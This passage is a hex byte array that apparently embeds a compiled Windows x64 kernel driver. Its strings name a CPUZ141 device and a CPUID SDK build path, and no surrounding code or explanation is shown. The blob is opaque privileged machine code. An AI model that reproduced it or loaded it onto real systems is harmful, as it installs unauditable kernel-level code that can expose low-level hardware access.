0x19, 0x19, 0x0C, 0x19, 0x19, 0x19, 0x0D, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x0E, 0x19, 0x19, 0x19, 0x0F, 0x19, 0x19, 0x19, 0x10, 0x19, 0x19, 0x19, 0x11, 0x19, 0x19, 0x19, 0x12, 0x19, 0x19, 0x19, 0x13, 0x19, 0x19, 0x19, 0x14, 0x19, 0x19, 0x19, 0x15, 0x19, 0x19, 0x19, 0x16, 0x19, 0x19, 0x19, 0x17, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x18, 0x0F, 0x1F, 0x00, 0xA5, 0x3B, 0x00, 0x00, 0x82, 0x3F, 0x00, 0x00, 0xFA, 0x41, 0x00, 0x00, 0xA4, 0x38, 0x00, 0x00, 0x75, 0x32, 0x00, 0x00, 0xBE, 0x3A, 0x00, 0x00, 0x64, 0x30, 0x00, 0x00, 0x35, 0x35, 0x00, 0x00, 0x60, 0x37, 0x00, 0x00, 0x5F, 0x42, 0x00, 0x00, 0x00, 0x09, 0x09, 0x09, 0x01, 0x09, 0x09, 0x09, 0x09, 0x09, 0x09, 0x09, 0x02, 0x09, 0x09, 0x09, 0x03, 0x09, 0x09, 0x09, 0x04, 0x09, 0x09, 0x09, 0x05, 0x09, 0x09, 0x09, 0x06, 0x09, 0x09, 0x09, 0x07, 0x09, 0x09, 0x09, 0x08, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x10, 0x48, 0x89, 0x6C, 0x24, 0x18, 0x48, 0x89, 0x74, 0x24, 0x20, 0x57, 0x48, 0x81, 0xEC, 0xA0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x05, 0xD2, 0x1C, 0x00, 0x00, 0x48, 0x33, 0xC4, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x15, 0xC0, 0xBB, 0xFF, 0xFF, 0x48, 0x8B, 0xF9, 0x48, 0x8D, 0x4C, 0x24, 0x38, 0x48, 0x8B, 0x82, 0xA0, 0x49, 0x00, 0x00, 0x48, 0x8D, 0x1D, 0xF2, 0x1C, 0x00, 0x00, 0x33, 0xF6, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 0xA8, 0x49, 0x00, 0x00, 0x48, 0x8D, 0x2D, 0xDF, 0x1F, 0x00, 0x00, 0x48, 0x89, 0x41, 0x08, 0x48, 0x8B, 0x82, 0xB0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x10, 0x48, 0x8B, 0x82, 0xB8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x18, 0x48, 0x8B, 0x82, 0xC0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x20, 0x48, 0x8B, 0x82, 0xD0, 0x49, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 0xD8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x08, 0x48, 0x8B, 0x82, 0xE0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x10, 0x48, 0x8B, 0x82, 0xE8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x18, 0x48, 0x8B, 0x82, 0xF0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x20, 0x48, 0x8B, 0x82, 0xF8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x28, 0x8B, 0x82, 0x00, 0x4A, 0x00, 0x00, 0x89, 0x41, 0x30, 0x0F, 0xB7, 0x82, 0x04, 0x4A, 0x00, 0x00, 0x66, 0x89, 0x41, 0x34, 0x8B, 0x43, 0x08, 0x85, 0xC0, 0x74, 0x18, 0x48, 0x8B, 0x0B, 0x48, 0x8B, 0xD0, 0xFF, 0x15, 0x4D, 0x0B, 0x00, 0x00, 0x89, 0x73, 0xF8, 0x89, 0x73, 0xFC, 0x48, 0x89, 0x33, 0x89, 0x73, 0x08, 0x48, 0x83, 0xC3, 0x18, 0x48, 0x3B, 0xDD, 0x7C, 0xD8, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x33, 0xD2, 0xFF, 0x15, 0x5D, 0x0B, 0x00, 0x00, 0x83, 0x7C, 0x24, 0x20, 0x05, 0x48, 0x8D, 0x44, 0x24, 0x38, 0x48, 0x8D, 0x54, 0x24, 0x60, 0x48, 0x8D, 0x4C, 0x24, 0x28, 0x48, 0x0F, 0x42, 0xD0, 0xFF, 0x15, 0xE7, 0x0A, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x28, 0xFF, 0x15, 0x6C, 0x0B, 0x00, 0x00, 0x48, 0x8B, 0x4F, 0x08, 0xFF, 0x15, 0xDA, 0x0A, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x33, 0xCC, 0xE8, 0x6A, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x9C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x49, 0x8B, 0x5B, 0x18, 0x49, 0x8B, 0x6B, 0x20, 0x49, 0x8B, 0x73, 0x28, 0x49, 0x8B, 0xE3, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x20, 0x53, 0x4C, 0x8B, 0xC1, 0x41, 0x8B, 0x00, 0x41, 0x8B, 0x58, 0x04, 0x41, 0x8B, 0x48, 0x08, 0x41, 0x8B, 0x50, 0x0C, 0xE6, 0xB2, 0xE6, 0x84, 0x41, 0x89, 0x00, 0x41, 0x89, 0x58, 0x04, 0x41, 0x89, 0x48, 0x08, 0x41, 0x89, 0x50, 0x0C, 0x5B, 0x48, 0x83, 0xC4, 0x20, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x3B, 0x0D, 0x29, 0x1B, 0x00, 0x00, 0x75, 0x12, 0x48, 0xC1, 0xC1, 0x10, 0x66, 0xF7, 0xC1, 0xFF, 0xFF, 0x75, 0x03, 0xC2, 0x00, 0x00, 0x48, 0xC1, 0xC9, 0x10, 0xE9, 0x08, 0x00, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x38, 0x4C, 0x8B, 0x0D, 0x05, 0x1B, 0x00, 0x00, 0x4C, 0x8B, 0x05, 0xF6, 0x1A, 0x00, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x8B, 0xD1, 0xB9, 0xF7, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x8A, 0x0A, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x45, 0x8B, 0x18, 0x48, 0x8B, 0xDA, 0x4C, 0x8B, 0xC9, 0x41, 0x83, 0xE3, 0xF8, 0x41, 0xF6, 0x00, 0x04, 0x4C, 0x8B, 0xD1, 0x74, 0x13, 0x41, 0x8B, 0x40, 0x08, 0x4D, 0x63, 0x50, 0x04, 0xF7, 0xD8, 0x4C, 0x03, 0xD1, 0x48, 0x63, 0xC8, 0x4C, 0x23, 0xD1, 0x49, 0x63, 0xC3, 0x4A, 0x8B, 0x14, 0x10, 0x48, 0x8B, 0x43, 0x10, 0x8B, 0x48, 0x08, 0x48, 0x03, 0x4B, 0x08, 0xF6, 0x41, 0x03, 0x0F, 0x74, 0x0C, 0x0F, 0xB6, 0x41, 0x03, 0x83, 0xE0, 0xF0, 0x48, 0x98, 0x4C, 0x03, 0xC8, 0x4C, 0x33, 0xCA, 0x49, 0x8B, 0xC9, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xE9, 0x45, 0xFF, 0xFF, 0xFF, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x28, 0x4D, 0x8B, 0x41, 0x38, 0x48, 0x8B, 0xCA, 0x49, 0x8B, 0xD1, 0xE8, 0x81, 0xFF, 0xFF, 0xFF, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x4C, 0x8B, 0xDC, 0x49, 0x89, 0x5B, 0x08, 0x49, 0x89, 0x6B, 0x18, 0x49, 0x89, 0x73, 0x20, 0x49, 0x89, 0x53, 0x10, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 0x4D, 0x8B, 0x71, 0x08, 0x4D, 0x8B, 0x29, 0x49, 0x63, 0x79, 0x48, 0x4D, 0x8B, 0x61, 0x38, 0x4D, 0x2B, 0xEE, 0xF6, 0x41, 0x04, 0x66, 0x49, 0x8B, 0xE9, 0x48, 0x8B, 0xF2, 0x4C, 0x8B, 0xF9, 0x48, 0x8B, 0xC7, 0x0F, 0x85, 0x9B, 0x00, 0x00, 0x00, 0x49, 0x89, 0x4B, 0xC8, 0x4D, 0x89, 0x43, 0xD0, 0x41, 0x3B, 0x3C, 0x24, 0x0F, 0x83, 0xF1, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC0, 0x49, 0x8D, 0x5C, 0xC4, 0x0C, 0x8B, 0x43, 0xF8, 0x4C, 0x3B, 0xE8, 0x72, 0x67, 0x8B, 0x43, 0xFC, 0x4C, 0x3B, 0xE8, 0x73, 0x5F, 0x83, 0x7B, 0x04, 0x00, 0x74, 0x59, 0x83, 0x3B, 0x01, 0x74, 0x15, 0x8B, 0x03, 0x48, 0x8D, 0x4C, 0x24, 0x30, 0x48, 0x8B, 0xD6, 0x49, 0x03, 0xC6, 0xFF, 0xD0, 0x85, 0xC0, 0x78, 0x4F, 0x7E, 0x3F, 0x8B, 0x4B, 0x04, 0x41, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xD6, 0x49, 0x03, 0xCE, 0xE8, 0xE2, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x40, 0x8B, 0x53, 0x04, 0x4D, 0x63, 0x0F, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8B, 0x45, 0x28, 0x49, 0x03, 0xD6, 0x4D, 0x8B, 0xC7, 0x48, 0x8B, 0xCE, 0x48, 0x89, 0x44, 0x24, 0x20, 0xE8, 0xF4, 0x01, 0x00, 0x00, 0xE8, 0xE7, 0x01, 0x00, 0x00, 0xFF, 0xC7, 0x48, 0x83, 0xC3, 0x10, 0x41, 0x3B, 0x3C, 0x24, 0x73, 0x6E, 0xEB, 0x83, 0x33, 0xC0, 0xEB, 0x6D, 0x49, 0x8B, 0x71, 0x20, 0x49, 0x2B, 0xF6, 0x41, 0x3B, 0x3C, 0x24, 0x73, 0x5B, 0x48, 0x03, 0xC0, 0x49, 0x8D, 0x5C, 0xC4, 0x08, 0x8B, 0x43, 0xFC, 0x4C, 0x3B, 0xE8, 0x72, 0x3F, 0x8B, 0x0B, 0x4C, 0x3B, 0xE9, 0x73, 0x38, 0x48, 0x3B, 0xF0, 0x72, 0x0C, 0x48, 0x3B, 0xF1, 0x77, 0x07, 0x41, 0xF6, 0x47, 0x04, 0x20, 0x75, 0x33, 0x83, 0x7B, 0x08, 0x00, 0x74, 0x0A, 0x8B, 0x43, 0x08, 0x48, 0x3B, 0xF0, 0x74, 0x25, 0xEB, 0x17, 0x48, 0x8B, 0x54, 0x24, 0x78, 0x8D, 0x47, 0x01, 0xB1, 0x01, 0x89, 0x45, 0x48, 0x44, 0x8B, 0x43, 0x04, 0x4D, 0x03, 0xC6, 0x41, 0xFF, 0xD0, 0xFF, 0xC7, 0x48, 0x83, 0xC3, 0x10, 0x41, 0x3B, 0x3C, 0x24, 0x72, 0xAD, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x5C, 0x24, 0x40, 0x49, 0x8B, 0x5B, 0x30, 0x49, 0x8B, 0x6B, 0x40, 0x49, 0x8B, 0x73, 0x48, 0x49, 0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xC1, 0x49, 0x83, 0xF8, 0x08, 0x72, 0x53, 0x0F, 0xB6, 0xD2, 0x49, 0xB9, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x49, 0x0F, 0xAF, 0xD1, 0x49, 0x83, 0xF8, 0x40, 0x72, 0x1E, 0x48, 0xF7, 0xD9, 0x83, 0xE1, 0x07, 0x74, 0x06, 0x4C, 0x2B, 0xC1, 0x48, 0x89, 0x10, 0x48, 0x03, 0xC8, 0x4D, 0x8B, 0xC8, 0x49, 0x83, 0xE0, 0x3F, 0x49, 0xC1, 0xE9, 0x06, 0x75, 0x39, 0x4D, 0x8B, 0xC8, 0x49, 0x83, 0xE0, 0x07, 0x49, 0xC1, 0xE9, 0x03, 0x74, 0x11, 0x66, 0x66, 0x66, 0x90, 0x90, 0x48, 0x89, 0x11, 0x48, 0x83, 0xC1, 0x08, 0x49, 0xFF, 0xC9, 0x75, 0xF4, 0x4D, 0x85, 0xC0, 0x74, 0x0A, 0x88, 0x11, 0x48, 0xFF, 0xC1, 0x49, 0xFF, 0xC8, 0x75, 0xF6, 0xC2, 0x00, 0x00, 0x66, 0x90, 0x66, 0x66, 0x66, 0x90, 0x66, 0x66, 0x90, 0x49, 0x81, 0xF9, 0x00, 0x1C, 0x00, 0x00, 0x73, 0x30, 0x48, 0x89, 0x11, 0x48, 0x89, 0x51, 0x08, 0x48, 0x89, 0x51, 0x10, 0x48, 0x83, 0xC1, 0x40, 0x48, 0x89, 0x51, 0xD8, 0x48, 0x89, 0x51, 0xE0, 0x49, 0xFF, 0xC9, 0x48, 0x89, 0x51, 0xE8, 0x48, 0x89, 0x51, 0xF0, 0x48, 0x89, 0x51, 0xF8, 0x75, 0xD8, 0xEB, 0x94, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x48, 0x0F, 0xC3, 0x11, 0x48, 0x0F, 0xC3, 0x51, 0x08, 0x48, 0x0F, 0xC3, 0x51, 0x10, 0x48, 0x83, 0xC1, 0x40, 0x48, 0x0F, 0xC3, 0x51, 0xD8, 0x48, 0x0F, 0xC3, 0x51, 0xE0, 0x49, 0xFF, 0xC9, 0x48, 0x0F, 0xC3, 0x51, 0xE8, 0x48, 0x0F, 0xC3, 0x51, 0xF0, 0x48, 0x0F, 0xC3, 0x51, 0xF8, 0x75, 0xD0, 0xF0, 0x80, 0x0C, 0x24, 0x00, 0xE9, 0x54, 0xFF, 0xFF, 0xFF, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x48, 0x89, 0x54, 0x24, 0x18, 0x44, 0x89, 0x44, 0x24, 0x10, 0x49, 0xC7, 0xC1, 0x20, 0x05, 0x93, 0x19, 0xEB, 0x08, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x90, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xFF, 0x25, 0x5A, 0x07, 0x00, 0x00, 0xCC, 0xCC, 0x5C, 0x00, 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x5C, 0x00, 0x63, 0x00, 0x70, 0x00, 0x75, 0x00, 0x7A, 0x00, 0x31, 0x00, 0x34, 0x00, 0x31, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x44, 0x00, 0x6F, 0x00, 0x73, 0x00, 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x5C, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x5A, 0x00, 0x31, 0x00, 0x34, 0x00, 0x31, 0x00, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x5C, 0x00, 0x44, 0x00, 0x6F, 0x00, 0x73, 0x00, 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x5C, 0x00, 0x47, 0x00, 0x6C, 0x00, 0x6F, 0x00, 0x62, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x5C, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x5A, 0x00, 0x31, 0x00, 0x34, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC4, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAC, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDC, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7E, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9E, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB6, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x72, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD2, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA8, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3B, 0x46, 0x34, 0x58, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x60, 0x51, 0x00, 0x00, 0x60, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0xE8, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x8F, 0x40, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F, 0x44, 0x17, 0x65, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x43, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x89, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, 0x16, 0x77, 0xEA, 0x61, 0x83, 0x4E, 0xBD, 0x4B, 0x91, 0x1F, 0xDD, 0x05, 0x86, 0xB8, 0x3C, 0x5E, 0x01, 0x00, 0x00, 0x00, 0x64, 0x3A, 0x5C, 0x63, 0x70, 0x75, 0x69, 0x64, 0x5C, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x5C, 0x63, 0x70, 0x75, 0x69, 0x64, 0x73, 0x64, 0x6B, 0x5C, 0x64, 0x72, 0x69, 0x76, 0x65, 0x72, 0x5C, 0x73, 0x79, 0x73, 0x5F, 0x63, 0x70, 0x75, 0x7A, 0x5F, 0x31, 0x34, 0x31, 0x5C, 0x6F, 0x62, 0x6A, 0x66, 0x72, 0x65, 0x5F, 0x77, 0x69, 0x6E, 0x37, 0x5F, 0x61, 0x6D, 0x64, 0x36, 0x34, 0x5C, 0x61, 0x6D, 0x64, 0x36, 0x34, 0x5C, 0x63, 0x70, 0x75, 0x7A, 0x31, 0x34, 0x31, 0x5F, 0x78, 0x36, 0x34, 0x2E, 0x70, 0x64, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x05, 0x02, 0x00, 0x05, 0x30, 0x04, 0x32, 0x19, 0x29, 0x09, 0x00, 0x17, 0x64, 0x19, 0x00, 0x17, 0x54, 0x18, 0x00, 0x17, 0x34, 0x17, 0x00, 0x17, 0x01, 0x14, 0x00, 0x10, 0x70, 0x00, 0x00, 0x94, 0x46, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00, 0x01, 0x04, 0x01, 0x00, 0x04, 0x62, 0x00, 0x00, 0x01, 0x0A, 0x04, 0x00, 0x0A, 0x74, 0x02, 0x00, 0x05, 0x34, 0x01, 0x00, 0x01, 0x12, 0x06, 0x00, 0x12, 0x64, 0x13, 0x00, 0x12, 0x34, 0x12, 0x00, 0x12, 0xF2, 0x0B, 0x70, 0x09, 0x2A, 0x0F, 0x00, 0x2A, 0x88, 0x2C, 0x00, 0x25, 0x78, 0x2D, 0x00, 0x21, 0x68, 0x2E, 0x00, 0x1D, 0x01, 0x5E, 0x00, 0x16, 0xF0, 0x14, 0xE0, 0x12, 0xD0, 0x10, 0xC0, 0x0E, 0x70, 0x0D, 0x60, 0x0C, 0x30, 0x00, 0x00, 0xB8, 0x46, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x4C, 0x16, 0x00, 0x00, 0x75, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x75, 0x16, 0x00, 0x00, 0xAB, 